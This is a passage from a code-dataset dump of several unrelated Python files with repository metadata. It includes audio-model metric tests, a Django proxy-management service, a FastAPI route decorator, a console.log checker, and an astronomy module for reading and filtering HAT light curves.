passed') if max_num-i+1 >=window else print('the time collected is less than window')\nwith open (output_file,'w') as fout:\n while max_num-i+1 >= window:\n seq_number=list(range(i,i+window))\n numbers=[error_dict['|'.join([str(time),name])] for name in stock_names for time in seq_number if '|'.join([str(time),name]) in error_dict]\n if len(numbers) ==0:\n fout.write(str(seq_number[0])+'|'+str(seq_number[-1])+'|NA\\n')\n else:\n mean=sum(numbers) / float(len(numbers))\n Rounded_Mean= '{:.2f}'.format(round(mean, 2))\n fout.write(str(seq_number[0])+'|'+str(seq_number[-1])+'|'+str(Rounded_Mean)+'\\n')\n i=i+1\n \n \n\n\n","repo_name":"ahvo/Insight_Stock_Error_Challenge","sub_path":"insight_testsuite/temp/src/prediction-validation.py","file_name":"prediction-validation.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23747564243","text":"from pathlib import Path\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\n\nfrom hifi_gan_bwe import metrics\n\n\ndef test_summary(tmpdir: Path) -> None:\n summary = metrics.Summary(\n project=\"hifi-gan-bwe\",\n name=\"bwe-01\",\n log_path=str(tmpdir / \"logs\"),\n scalars=[metrics.Ema(\"gen_loss\"), metrics.Mean(\"gen_fit\")],\n use_wandb=False,\n )\n\n # scalars\n assert summary.scalars == dict(gen_loss=np.nan, gen_fit=np.nan)\n\n summary.update(gen_loss=0.5, gen_fit=1.0)\n assert summary.scalars == dict(gen_loss=0.5, gen_fit=1.0)\n\n summary.save(iterations=1000)\n assert summary.scalars == dict(gen_loss=np.nan, gen_fit=np.nan)\n\n # figure\n fig, ax = plt.subplots(1, 1)\n ax.plot(np.zeros([10]))\n summary.figure(iterations=1000, figure=fig, name=\"figure\")\n\n # audio\n audio = np.zeros([8000])\n summary.audio(iterations=1000, audio=audio, sample_rate=8000, name=\"audio\")\n\n\ndef test_mean() -> None:\n metric = metrics.Mean(\"test\")\n assert metric.value is np.nan\n assert metric.count == 0\n\n values = np.arange(5)\n for x in values:\n metric.update(x)\n assert metric.value == values.mean()\n assert metric.count == len(values)\n\n metric.reset()\n assert metric.value is np.nan\n assert metric.count == 0\n\n\ndef test_ema() -> None:\n alpha = 0.9\n metric = metrics.Ema(\"test\", alpha=alpha)\n assert metric.value is np.nan\n\n values = np.arange(5)\n ema = np.nan\n for x in values:\n metric.update(x)\n ema = x if ema is np.nan else ema * alpha + x * (1 - alpha)\n assert np.allclose(metric.value, ema)\n\n metric.reset()\n assert metric.value is np.nan\n\n\ndef test_grad_norm() -> None:\n model = torch.nn.Linear(32, 64)\n y_pred = model(torch.zeros([1, 32]))\n y_true = torch.ones_like(y_pred)\n loss = torch.nn.MSELoss()(y_pred, y_true)\n loss.backward()\n assert metrics.grad_norm(model).shape == ()\n\n\n@torch.no_grad()\ndef test_weight_norm() -> None:\n model = torch.nn.Linear(32, 64)\n assert np.allclose(metrics.weight_norm(model), model.weight.norm(2))\n","repo_name":"brentspell/hifi-gan-bwe","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"85"} +{"seq_id":"28579901930","text":"from proxy_service_provider.apps.configuration.serializers.proxy_serializer import ProxiesSerializer\nfrom proxy_service_provider.apps.configuration.models.proxies import Proxies\nfrom proxy_service_provider.apps.configuration.models.test_url import TestURL\nfrom 
proxy_service_provider.apps.configuration.models.proxy_functionality_test import ProxyFunctionalityTest\nfrom proxy_service_provider.apps.configuration.services.proxy_fetcher import ProxyFetching\nfrom django.db.models import Q\nfrom datetime import datetime\nimport time\n\nclass ProxyServices:\n\n def bulk_create(self, proxy_provider, ip_list: list):\n counter = 0\n for item in ip_list:\n data = {\n 'ip_address': item[0],\n 'port_number': item[1],\n 'proxy_provider_id': proxy_provider.id,\n 'is_tested': False,\n 'last_found': datetime.now(),\n 'first_found': datetime.now()\n }\n i = self.create(data)\n if i is not None:\n counter += 1\n return counter\n\n def bulk_delete(self, proxy_provider_id, ip_list: list):\n counter = 0\n try:\n find_proxy = Proxies.objects.filter(proxy_provider_id=proxy_provider_id).exclude(ip_address__in=ip_list)\n counter = find_proxy.count()\n find_proxy.delete()\n return counter\n except Exception as ex:\n return counter, []\n\n def bulk_update(self, proxy_provider_id, ip_list: list):\n counter = 0\n only_ips = [i[0] for i in ip_list]\n # Delete not listed ip_address\n counts = self.bulk_delete(proxy_provider_id=proxy_provider_id,ip_list=only_ips)\n find_existed_ip = Proxies.objects.values_list('ip_address').filter(proxy_provider_id=proxy_provider_id)\n find_existed_ip.update(last_found = datetime.now())\n list_find_existed_ip = list(find_existed_ip)\n existed_proxies = len(list_find_existed_ip)\n for item in ip_list:\n if item[0] not in list_find_existed_ip:\n data = {\n 'ip_address': item[0],\n 'port_number': item[1],\n 'proxy_provider_id': proxy_provider_id,\n 'is_tested': False,\n 'last_found': datetime.now(),\n 'first_found': datetime.now()\n }\n i = self.create(data)\n if i is not None:\n counter += 1\n return counter+existed_proxies\n\n\n def perform_functionality_test(self, proxy_provider, test_url_id: id):\n try:\n proxy_provider.functionality_test_state = 'running'\n proxy_provider.save()\n proxies = Proxies.objects.filter(proxy_provider_id=proxy_provider.id)\n test_url_id = TestURL.objects.get(id=test_url_id)\n proxy_fetching = ProxyFetching()\n count = 0\n for i in proxies:\n print(i)\n count +=1\n output = proxy_fetching.pass_proxy_test(proxy_address=i.ip_address,proxy_port=i.port_number,test_url=test_url_id.test_url_address, json_res=test_url_id.is_output_json)\n i.is_tested = output['result']\n i.last_successful_functionality_test = datetime.now()\n i.save()\n result_data = {\n 'proxy_id': i,\n 'test_url_id':test_url_id,\n 'is_test_passed': output['result'],\n 'test_mesasge': output['output']\n }\n print(result_data)\n func_test = ProxyFunctionalityTest(**result_data)\n func_test.save()\n proxy_provider.functionality_test_state = 'completed'\n proxy_provider.save()\n return None\n except Exception as ex:\n print(ex)\n return None\n\n def create(self, kw: dict):\n \"\"\"\n :type kw: object\n \"\"\"\n proxy = ProxiesSerializer(data=kw)\n if proxy.is_valid():\n proxy.save()\n return proxy\n else:\n return None\n","repo_name":"musfiqurcse/proxy-service-provider","sub_path":"src/proxy_service_provider/apps/configuration/services/proxy_services.py","file_name":"proxy_services.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19004534721","text":"from functools import wraps\n\n_api_routes_registry = []\n\n\nclass api_route(object):\n def __init__(self, path, **kwargs):\n self._path = path\n self._kwargs = kwargs\n\n def __call__(self, fn):\n cls, 
method = fn.__repr__().split(\" \")[1].split(\".\")\n _api_routes_registry.append(\n {\n \"fn\": fn,\n \"path\": self._path,\n \"kwargs\": self._kwargs,\n \"cls\": cls,\n \"method\": method,\n }\n )\n\n @wraps(fn)\n def decorated(*args, **kwargs):\n return fn(*args, **kwargs)\n\n return decorated\n\n\ndef add_api_routes(router):\n for reg in _api_routes_registry:\n if router.__class__.__name__ == reg[\"cls\"]:\n router.add_api_route(path=reg[\"path\"], endpoint=getattr(router, reg[\"method\"]), **reg[\"kwargs\"])\n","repo_name":"darkchats/darkbuild","sub_path":"funbuild/tool/fastapi.py","file_name":"fastapi.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"43445538549","text":"# coding: utf-8\nimport logging\nimport re\nimport os\nfrom cactus.test_base import CactusTestBase\n\n\nclass ConsoleLogTest(CactusTestBase):\n def run(self):\n basedir = self.site.paths['dist']\n found = []\n for (path, dirs, files) in os.walk(basedir):\n for file in files:\n if file.lower().endswith(\".js\"):\n lineno = 0\n f = os.path.join(path, file)\n for line in open(f,'r'):\n lineno += 1\n if re.search(r'console\\.log', line, re.I):\n found.append({\n \"file\": f,\n \"line\": lineno,\n \"content\": line,\n })\n if found:\n logging.warn(\"==========================================================================\")\n logging.warn(\"Found {0} console.log statements:\".format(len(found)))\n for l in found:\n logging.warn(\"{0}:{1}\".format(l.get(\"file\"), l.get(\"line\")))\n logging.warn(l.get(\"content\"))\n logging.warn(\"==========================================================================\")\n return False\n return True","repo_name":"randomknowledge/Cactus_Refactored","sub_path":"cactus/tests/console_log.py","file_name":"console_log.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"85"} +{"seq_id":"7885613573","text":"#!/usr/bin/env python\r\n\r\n'''\r\nlcutils_hatlc.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Dec 2013\r\n\r\nContains various useful tools for reading, writing, and filtering consolidated\r\nHAT LCs produced by the HAT LC server.\r\n\r\n'''\r\n\r\nimport logging\r\nimport os.path\r\nimport hashlib\r\nimport gzip\r\nimport bz2\r\n\r\n\r\nimport numpy as np\r\nimport pyfits\r\n\r\n###################\r\n## LOCAL IMPORTS ##\r\n###################\r\n\r\n#from timeutils import jd_to_bjd, jd_to_hjd # IMPORT TIMEUTILS later; you need CSPICE/PySPICE. Check if Della has those... 
// They do NOT!\r\nfrom timeutils_temp import jd_to_bjd, jd_to_hjd\r\n\r\n\r\nimport lcutils_config as conf\r\nimport lcutils_formatters as lcform\r\nimport lcutils_postprocessing as lcpp\r\n\r\n\r\n#############\r\n## LOGGING ##\r\n#############\r\n\r\n# setup a logger\r\nLOGGER = logging.getLogger('lcutils_hatlc')\r\nLOGGER.addHandler(logging.NullHandler())\r\n\r\n# default to debug mode = False\r\nDEBUGMODE = False\r\n\r\ndef set_debug(debugbool):\r\n globals()['DEBUGMODE'] = debugbool\r\n lcform.set_debug(True)\r\n\r\n\r\n#################################################\r\n## FUNCTIONS TO DEAL WITH THE CONSOLIDATED LCS ##\r\n#################################################\r\n\r\ndef read_consolidated_hatlc(hatlc,\r\n forceformat=None,\r\n forcecompression=None):\r\n '''\r\n This reads a consolidated HAT LC written by the functions above.\r\n\r\n Returns a dict.\r\n\r\n '''\r\n\r\n lcfname = os.path.basename(hatlc)\r\n\r\n if forceformat and forcecompression:\r\n\r\n if 'gz' in forcecompression:\r\n lcf = gzip.open(hatlc,'rb')\r\n elif 'bz2' in forcecompression:\r\n lcf = bz2.BZ2File(hatlc,'rb')\r\n\r\n else:\r\n\r\n # unzip the files first\r\n if '.gz' in lcfname:\r\n lcf = gzip.open(hatlc,'rb')\r\n elif '.bz2' in lcfname:\r\n lcf = bz2.BZ2File(hatlc, 'rb')\r\n else:\r\n lcf = open(hatlc,'rb')\r\n\r\n if '.fits' in lcfname or (forceformat and forceformat == 'fits'):\r\n\r\n hdulist = pyfits.open(lcf)\r\n objectinfo = hdulist[0].header\r\n objectlc = hdulist[1].data\r\n lccols = objectlc.columns.names\r\n hdulist.close()\r\n lcf.close()\r\n\r\n lcdict = {}\r\n\r\n for col in lccols:\r\n lcdict[col] = np.array(objectlc[col])\r\n\r\n lcdict['hatid'] = objectinfo['hatid']\r\n lcdict['twomassid'] = objectinfo['2massid']\r\n lcdict['ra'] = objectinfo['ra']\r\n lcdict['dec'] = objectinfo['dec']\r\n lcdict['mags'] = [objectinfo[x] for x in ('vmag','rmag','imag',\r\n 'jmag','hmag','kmag')]\r\n lcdict['ndet'] = objectinfo['ndet']\r\n lcdict['hatstations'] = objectinfo['hats']\r\n lcdict['filters'] = objectinfo['filters']\r\n lcdict['columns'] = lccols\r\n\r\n return lcdict\r\n\r\n elif '.csv' in lcfname or '.hatlc' in lcfname or (forceformat and\r\n forceformat == 'csv'):\r\n\r\n lcflines = lcf.readlines()\r\n lcf.close()\r\n\r\n # now process the read-in LC\r\n objectdata = [x for x in lcflines if x.startswith('#')]\r\n objectlc = [x for x in lcflines if not x.startswith('#')]\r\n objectlc = [x for x in objectlc if len(x) > 1]\r\n\r\n if '.csv' in lcfname:\r\n objectlc = [x.split(',') for x in objectlc]\r\n else:\r\n objectlc = [x.split() for x in objectlc]\r\n\r\n # transpose split rows to get columns\r\n objectlc = zip(*objectlc)\r\n\r\n # read the header to figure out the object's info and column names\r\n objectdata = [x.strip('#') for x in objectdata]\r\n objectdata = [x.strip() for x in objectdata]\r\n objectdata = [x for x in objectdata if len(x) > 0]\r\n\r\n hatid, twomassid = objectdata[0].split(' - ')\r\n ra, dec = objectdata[1].split(', ')\r\n ra = float(ra.split(' = ')[-1].strip(' deg'))\r\n dec = float(dec.split(' = ')[-1].strip(' deg'))\r\n\r\n vmag, rmag, imag, jmag, hmag, kmag = objectdata[2].split(', ')\r\n vmag = float(vmag.split(' = ')[-1])\r\n rmag = float(rmag.split(' = ')[-1])\r\n imag = float(imag.split(' = ')[-1])\r\n jmag = float(jmag.split(' = ')[-1])\r\n hmag = float(hmag.split(' = ')[-1])\r\n kmag = float(kmag.split(' = ')[-1])\r\n\r\n ndet = int(objectdata[3].split(': ')[-1])\r\n hatstations = objectdata[4].split(': ')[-1]\r\n\r\n filterhead_ind = 
objectdata.index('Filters used:')\r\n columnhead_ind = objectdata.index('Columns:')\r\n\r\n filters = objectdata[filterhead_ind:columnhead_ind]\r\n\r\n columndefs = objectdata[columnhead_ind+1:]\r\n\r\n columns = []\r\n for line in columndefs:\r\n\r\n colnum, colname, coldesc = line.split(' - ')\r\n columns.append(colname)\r\n\r\n lcdict = {}\r\n\r\n # now write all the columns to the output dictionary\r\n for ind, col in enumerate(columns):\r\n\r\n # this formats everything nicely using our existing column\r\n # definitions\r\n lcdict[col] = np.array([conf.TEXTLC_OUTPUT_COLUMNS[col][3](x)\r\n for x in objectlc[ind]])\r\n\r\n # write the object metadata to the output dictionary\r\n lcdict['hatid'] = hatid\r\n lcdict['twomassid'] = twomassid.strip('2MASS J')\r\n lcdict['ra'] = ra\r\n lcdict['dec'] = dec\r\n lcdict['mags'] = [vmag, rmag, imag, jmag, hmag, kmag]\r\n lcdict['ndet'] = ndet\r\n lcdict['hatstations'] = hatstations.split(', ')\r\n lcdict['filters'] = filters[1:]\r\n lcdict['cols'] = columns\r\n\r\n return lcdict\r\n\r\n\r\n\r\ndef write_consolidated_hatlc(lcdict,\r\n outtype='ssv',\r\n compress='gz',\r\n outdir=None,\r\n filterhash=None,\r\n normalized=False):\r\n '''\r\n This writes a LC dict from a HATLC back to a HATLC. Useful if any\r\n modifications such as filtering on columns, etc. have been made to the\r\n lcdict.\r\n\r\n '''\r\n\r\n # generate the objinfo tuple\r\n objinfo = (lcdict['hatid'],\r\n lcdict['ra'],\r\n lcdict['dec'],\r\n lcdict['mags'][0],\r\n lcdict['mags'][1],\r\n lcdict['mags'][2],\r\n lcdict['mags'][3],\r\n lcdict['mags'][4],\r\n lcdict['mags'][5],\r\n lcdict['twomassid'])\r\n\r\n\r\n if outtype == 'json':\r\n outlc = lcform.OUTPUTLC_FORMATTERS['json'](lcdict,\r\n objinfo)\r\n\r\n\r\n elif outtype is not None:\r\n outlc = lcform.OUTPUTLC_FORMATTERS[outtype](lcdict,\r\n objinfo,\r\n outputdir=outdir,\r\n compress=compress,\r\n filterhash=filterhash,\r\n normalized=normalized)\r\n else:\r\n outlc = lcform.OUTPUTLC_FORMATTERS['lcdict'](lcdict,\r\n objinfo)\r\n\r\n return outlc\r\n\r\n\r\n\r\ndef reform_consolidated_hatlc(lcdict,\r\n columns='default',\r\n outtype='ssv',\r\n outdir=None,\r\n compress='gz',\r\n normalize=False,\r\n filterhash=None):\r\n '''\r\n This reforms a consolidated HATLC dictionary, returning only the columns\r\n requested in columns:\r\n\r\n columns = '' or a comma separated list of columns\r\n from TEXTLC_OUTPUT_COLUMNS\r\n\r\n The other parameters are the same as for get_hat_lc.\r\n\r\n '''\r\n\r\n # parse the columns\r\n if columns in ('default', 'epdlc', 'tfalc', 'redlc', 'fullred', 'full'):\r\n\r\n cols = conf.HATLC_OUTPUT_COLUMNS[columns]\r\n\r\n else:\r\n\r\n cols = columns.split(',')\r\n\r\n if not all([col in conf.TEXTLC_OUTPUT_COLUMNS for col in cols]):\r\n if LOGGER:\r\n LOGGER.error('some of the requested columns are invalid')\r\n if DEBUGMODE:\r\n print('lcutils: some of the requested columns are invalid')\r\n\r\n return None\r\n\r\n # make a copy of the lcdict and remove the columns we don't want\r\n modlcdict = lcdict.copy()\r\n\r\n # cols we don't want\r\n colswantedset = set(cols)\r\n colspresentset = set(lcdict['cols'])\r\n colstoremove = colspresentset - colswantedset\r\n\r\n for col in colstoremove:\r\n del modlcdict[col]\r\n\r\n modlcdict['cols'] = cols\r\n\r\n # now deal with columns to add to the output dict\r\n\r\n # deal with an RSTF column\r\n if 'RSTF' in cols:\r\n\r\n rstf = ['%s-%s' % (x,y) for (x,y) in zip(lcdict['STF'],\r\n lcdict['CFN'])]\r\n modlcdict['RSTF'] = rstf\r\n\r\n # deal with a MJD column\r\n 
if ('MJD' in cols and\r\n 'MJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n # convert to MJD\r\n mjd = rjd - 0.5\r\n\r\n modlcdict['MJD'] = mjd.tolist()\r\n\r\n # deal with a FJD column\r\n if ('FJD' in cols and\r\n 'FJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n fjd = rjd + 2400000.0\r\n\r\n modlcdict['FJD'] = fjd.tolist()\r\n\r\n # get the obslon, obslat, obsalt required for conversion to BJD or HJD, but\r\n # only if the HJD/BJD columns aren't in the input lcdict\r\n if 'BJD' in cols or 'HJD' in cols and (not ('BJD' in lcdict['cols'] or\r\n 'HJD' in lcdict['cols'])):\r\n\r\n # grab the STF column and get the station ids\r\n stf = lcdict['STF']\r\n networks = lcdict['NET']\r\n\r\n # get the station locations to convert to BJD\r\n obslat, obslon, obsalt = ([conf.HAT_LOCATIONS[x][y][0] for\r\n (x,y) in zip(networks,stf)],\r\n [conf.HAT_LOCATIONS[x][y][1] for\r\n (x,y) in zip(networks,stf)],\r\n [conf.HAT_LOCATIONS[x][y][2] for\r\n (x,y) in zip(networks,stf)])\r\n objra = lcdict['ra']\r\n objdec = lcdict['dec']\r\n\r\n # deal with a requested BJD column\r\n if ('BJD' in cols and\r\n 'BJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n # convert to full JD\r\n rjd = rjd + 2400000.0\r\n\r\n # convert to BJD\r\n bjd = [\r\n jd_to_bjd(x,objra,objdec,y,z,w)\r\n for (x,y,z,w) in zip(rjd,obslat,obslon,obsalt)\r\n ]\r\n\r\n modlcdict['BJD'] = bjd\r\n\r\n # deal with a HJD column\r\n if ('HJD' in cols and\r\n 'HJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n # convert to full JD\r\n rjd = rjd + 2400000.0\r\n\r\n # convert to BJD\r\n hjd = [jd_to_hjd(x,objra,objdec) for x in rjd]\r\n\r\n modlcdict['HJD'] = hjd\r\n\r\n\r\n # if we're supposed to normalize magnitudes, do so\r\n if normalize:\r\n\r\n # figure out what columns we're normalizing\r\n if normalize is True:\r\n normalizecols = 'all'\r\n elif isinstance(normalize, str) or isinstance(normalize, unicode):\r\n normalizecols = normalize\r\n\r\n lcpp.normalize_mags_to_group_median(modlcdict,\r\n magcols=normalizecols)\r\n\r\n\r\n\r\n # now write this modified lcdict as the requested output type\r\n # note that outtype=None just returns the modified lcdict\r\n outlc = write_consolidated_hatlc(modlcdict,\r\n outtype=outtype,\r\n outdir=outdir,\r\n compress=compress,\r\n filterhash=filterhash,\r\n normalized=normalize)\r\n\r\n del modlcdict\r\n\r\n return outlc\r\n\r\n\r\n\r\ndef parse_hatlc_filters(filters):\r\n '''\r\n This parses a filter sequence as defined in filter_consolidated_hatlc below.\r\n\r\n '''\r\n\r\n filter_operators = {'and':'&',\r\n 'or':'|'}\r\n\r\n # this holds the elements for the np.where statement we're building\r\n where_eval_strlist = []\r\n\r\n for filter_ind, datafilter in enumerate(filters):\r\n\r\n # if the this filter has 3 elems, it needs to be ANDed/ORed with\r\n # other filters\r\n if len(datafilter) == 3:\r\n\r\n # the first filter can't have three elems\r\n if filter_ind == 0:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters: filter %s is bad,'\r\n ' ignoring...' 
%\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # deal with three-elem filters as usual\r\n else:\r\n\r\n filter_op, filter_col, filter_conds = datafilter\r\n\r\n # if the filter operator is not legit or if the filter column\r\n # doesn't make sense, ignore this filter\r\n if ((filter_op not in ['and','or']) or\r\n (filter_col not in conf.TEXTLC_OUTPUT_COLUMNS)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters: '\r\n 'filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, try to process this filter\r\n else:\r\n\r\n # parse the filter conditions\r\n filter_conds = filter_conds.split()\r\n cond_op = filter_conds[0]\r\n\r\n # if the operator is not legal, ignore this filter\r\n if cond_op not in conf.CONDITION_OPERATORS:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the operator is 'between' and there aren't two filter\r\n # operands, ignore this filter\r\n elif ((cond_op == 'between') and\r\n (len(filter_conds[1:]) != 2)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the operator is not 'between' and there's more than one\r\n # operand, ignore this filter\r\n elif ((cond_op != 'between') and\r\n (len(filter_conds[1:]) != 1)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' 
%\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if all the checks above pass, then process the filter\r\n # definition\r\n else:\r\n\r\n filter_cond_elements = filter_conds\r\n filter_cond_operator = filter_cond_elements[0]\r\n\r\n # deal with the between operator\r\n if (len(filter_cond_elements[1:]) > 1 and\r\n filter_cond_operator == 'between'):\r\n\r\n operand1, operand2 = filter_cond_elements[1:]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n if operand2.isalpha():\r\n operand2 = \"'%s'\" % operand2\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n operand2 = \"'%s'\" % operand2\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1,\r\n operand2=operand2\r\n )\r\n\r\n # deal with the other operators\r\n else:\r\n\r\n operand1 = filter_cond_elements[1]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1\r\n )\r\n\r\n full_filter_string = '%s %s' % (\r\n filter_operators[filter_op],\r\n condition_string\r\n )\r\n where_eval_strlist.append(full_filter_string)\r\n\r\n\r\n # deal with two element filter definitions\r\n elif len(list(datafilter)) == 2:\r\n\r\n # process the first filter\r\n if filter_ind == 0:\r\n\r\n filter_col, filter_conds = datafilter\r\n\r\n # if the filter column is not legit, ignore this filter\r\n if (filter_col not in conf.TEXTLC_OUTPUT_COLUMNS):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, try to process this filter\r\n else:\r\n\r\n # parse the filter conditions\r\n filter_conds = filter_conds.split()\r\n cond_op = filter_conds[0]\r\n\r\n # if the filter condition's operator isn't legit, ignore\r\n # this filter\r\n if cond_op not in conf.CONDITION_OPERATORS:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the filter condition's operator is between and the\r\n # number of filter operands is not 2, then ignore this\r\n # filter\r\n elif ((cond_op == 'between') and\r\n (len(filter_conds[1:]) != 2)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, if we have another filter, but the number of\r\n # operands is not 1, ignore this filter\r\n elif ((cond_op != 'between') and\r\n (len(filter_conds[1:]) != 1)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' 
%\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if all of the tests above pass, then process this filter\r\n else:\r\n\r\n filter_cond_elements = filter_conds\r\n filter_cond_operator = filter_cond_elements[0]\r\n\r\n # deal with the between operator\r\n if (len(filter_cond_elements[1:]) > 1 and\r\n filter_cond_operator == 'between'):\r\n\r\n operand1, operand2 = filter_cond_elements[1:]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n if operand2.isalpha():\r\n operand2 = \"'%s'\" % operand2\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n operand2 = \"'%s'\" % operand2\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1,\r\n operand2=operand2\r\n )\r\n\r\n # deal with the other operators\r\n else:\r\n\r\n operand1 = filter_cond_elements[1]\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1\r\n )\r\n\r\n full_filter_string = condition_string\r\n where_eval_strlist.append(full_filter_string)\r\n\r\n # if this filter isn't the first one and it has only two elems,\r\n # then it needs to be ANDed with any previous filters\r\n else:\r\n\r\n filter_col, filter_conds = datafilter\r\n filter_conds = filter_conds.split()\r\n filter_op = 'and'\r\n\r\n # if the filter operator or the filter column don't make sense,\r\n # then ignore this filter\r\n if ((filter_op not in ['and','or']) or\r\n (filter_col not in conf.TEXTLC_OUTPUT_COLUMNS)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, try to process this filter\r\n else:\r\n\r\n # parse the filter conditions\r\n cond_op = filter_conds[0]\r\n\r\n # if the filter condition's operator isn't legit, then\r\n # ignore this filter\r\n if cond_op not in conf.CONDITION_OPERATORS:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the filter condition's operator is 'between' but the\r\n # number of operands is not 2, then ignore this filter\r\n elif ((cond_op == 'between') and\r\n (len(filter_conds[1:]) != 2)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the filter condition's operator is not 'between' but\r\n # the number of operands is not 1, then ignore this filter\r\n elif ((cond_op != 'between') and\r\n (len(filter_conds[1:]) != 1)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' 
